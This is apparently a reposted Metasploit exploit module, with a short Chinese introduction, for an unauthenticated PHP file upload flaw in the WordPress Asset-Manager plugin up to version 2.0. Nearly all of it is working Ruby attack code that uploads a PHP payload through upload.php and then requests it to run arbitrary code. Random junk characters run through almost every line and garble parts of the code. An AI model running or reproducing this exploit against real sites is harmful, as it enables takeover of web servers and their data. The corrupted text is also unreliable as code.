这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。3 O, I2 X$ q1 \& f, w0 j
' F1 v3 q- h+ O/ j( R5 ?##
* {6 B7 j2 I4 r- ]5 Y) F5 i# This file is part of the Metasploit Framework and may be subject to2 c1 u; r, B0 m3 p2 E6 K' U$ V
# redistribution and commercial restrictions. Please see the Metasploit
h/ o a0 w: B5 T3 a! s. o# T# Framework web site for more information on licensing and terms of use.
3 B' X+ D5 {( e5 |( }: F) @# http://metasploit.com/framework/
$ z- C% H. H X0 \2 X/ Z6 V% l- R##
2 f6 e! a' x `4 @; X5 r
' I: H; k% J+ ?) qrequire 'msf/core'
1 p* N& Z' O1 u: C% c8 T+ @require 'msf/core/exploit/php_exe'
, [. O4 m) m4 W/ G% r0 S7 [9 c8 w
; E2 r' h$ H2 H: vclass Metasploit3 < Msf::Exploit::Remote
5 y/ _9 R. y' ], |/ j Rank = ExcellentRanking
! B8 O7 e Z9 I5 e$ V ; Z0 A+ A' Y' K( K. Z$ P' ~1 B
include Msf::Exploit::Remote::HttpClient% ^0 y: a4 O- J% M4 K8 [
include Msf::Exploit: hpEXE, s9 q; Z( w. ^- I
6 `% i# k6 r- z# M6 `- G. F( i+ t
def initialize(info = {})/ U; p* ^: B' s& {& f: H3 B
super(update_info(info,, ^ z1 A( e( K/ D5 F G
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
% g, E7 e, \2 R! |& I) v 'Description' => %q{, x+ F. O8 M @, s! q0 H; T8 |
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
6 @4 e- s8 B9 e5 e( z: t# p plugin. By abusing the upload.php file, a malicious user can upload a file to a% _: k S: R( g! c% o
temp directory without authentication, which results in arbitrary code execution.
1 ]% L) z; m- Y+ Z8 @% `1 h! ^8 e },4 x( D, Y: J* Q G/ ~$ i( S
'Author' =>
2 g+ z5 a( G$ H+ c [
% S9 s- a+ X; f" E% r; f 'Sammy FORGIT', # initial discovery% l8 V S8 r" V. K' u5 _
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+ m7 Z& y Z! Q- u: E: a; }, b ],
" p G( N: h" Z8 L8 C7 r. C! H 'License' => MSF_LICENSE,9 o6 t% n2 Q: ?, M" z2 o* l) f
'References' =>
0 _5 T p. w5 W$ Q: `7 [ [2 {$ F3 d5 ]& s# Q5 }
[ 'OSVDB', '82653' ],7 q' j G( S# F
[ 'BID', '53809' ],$ H9 g+ t0 m3 `( `
[ 'EDB', '18993' ],
; w7 i9 Q# A1 Q7 V [ 'URL', 'http:// www.myhack58.com /' ]% {( D4 w) x6 x G
],
9 M) M8 i( Y' D" } 'Payload' =>
% l; W) W0 A# h! {( P- U" M {
( { B# |6 N' Y. {$ R; A+ Z 'BadChars' => "\x00",# F9 V' B) Q% S" R" P) [
},% W3 L$ a5 c+ f1 [
'Platform' => 'php',
]1 l- D; l y8 l& ~ 'Arch' => ARCH_PHP,
9 s6 W7 k: \! K# i" ~" N 'Targets' =>
0 I- p, D# X/ c3 r6 P' X [ B( l/ Q4 h+ K- J) u" G
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],3 _* }. w( j- O& j0 G" V
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 Y; k& k" [" W5 V, d% r
],8 }8 V( ?- [, \/ h5 _. |" R* I6 {
'DefaultTarget' => 0,
% X& P) [ J4 D 'DisclosureDate' => 'May 26 2012'))# N; K& E0 b% f% ~: P' B
/ ?" ~# z( x1 T. r# j: j0 n register_options( k- Y2 I, c* W6 ^: X. ], A
[
9 p5 n% T$ l* W0 [" G$ v OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
, O+ t: J6 s( `" R. _' z ], self.class)
7 D* K* a5 {+ C end; ?+ D2 Y1 o1 e- ~/ R1 ^
- f* ?, a c' K( L) d def exploit0 q6 C% J8 \$ F/ I
uri = target_uri.path! K# J" ^& b" ]3 k/ W$ M
uri << '/' if uri[-1,1] != '/'
' B0 f; l& U# [& w peer = "#{rhost}:#{rport}", D7 m8 w. s1 f7 l" _0 ^" ]
payload_name = "#{rand_text_alpha(5)}.php"
" G3 K: I& z1 H- _# J% M8 h php_payload = get_write_exec_payload(:unlink_self=>true): |9 D) f; S. `' e/ t1 h ?) ?
( z% D& ?0 y. M5 d" d! g% V8 M& `; S
data = Rex::MIME::Message.new0 H ^2 B& B; X
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")4 J/ a" w7 X: ^# n
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- n. e/ \7 ?: _, q. T; w
- e* n5 C1 d* o! K print_status("#{peer} - Uploading payload #{payload_name}")& ]+ [/ W6 E/ C* c! W
res = send_request_cgi({
" R- W. r+ J- X 'method' => 'POST',
4 q* y) C- U2 \/ ?' Z7 \ 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
9 y* F/ M& f' x' n% ]* P 'ctype' => "multipart/form-data; boundary=#{data.bound}",
4 ^4 s% R# ~0 ~; n 'data' => post_data" l1 j: I1 r, @+ j3 \/ e0 _
})
9 [4 Q# J9 F# U! P. h! T
$ F7 ]. w/ a' W4 r) {! l if not res or res.code != 200 or res.body !~ /#{payload_name}/. f4 y1 m* X1 ^/ w5 { t, Z
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
' @) |0 S' ]: g3 V! m- ?# vend' d5 s. L# H, |# |; B5 D
$ ~- |3 w/ o$ O) J3 F print_status("#{peer} - Executing payload #{payload_name}")
9 M [0 p3 G. x' D; O+ W res = send_request_raw({
: N: n$ @. `8 O0 L4 Y/ W( n( m 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
8 H; p3 O# z$ s# r 'method' => 'GET'/ G# w7 L! s- \
})
6 v2 C3 Z2 {1 h4 S: c0 ^' P * Q' @( ?' }/ X+ i, N7 D6 v
if res and res.code != 200
8 T2 a+ w8 m/ g, g" ] fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
9 u# R" i' q9 D end1 X y& ?7 {. A2 l( q
end
# z2 C1 |: W nend
1 f; \ N' J8 f0 @! m |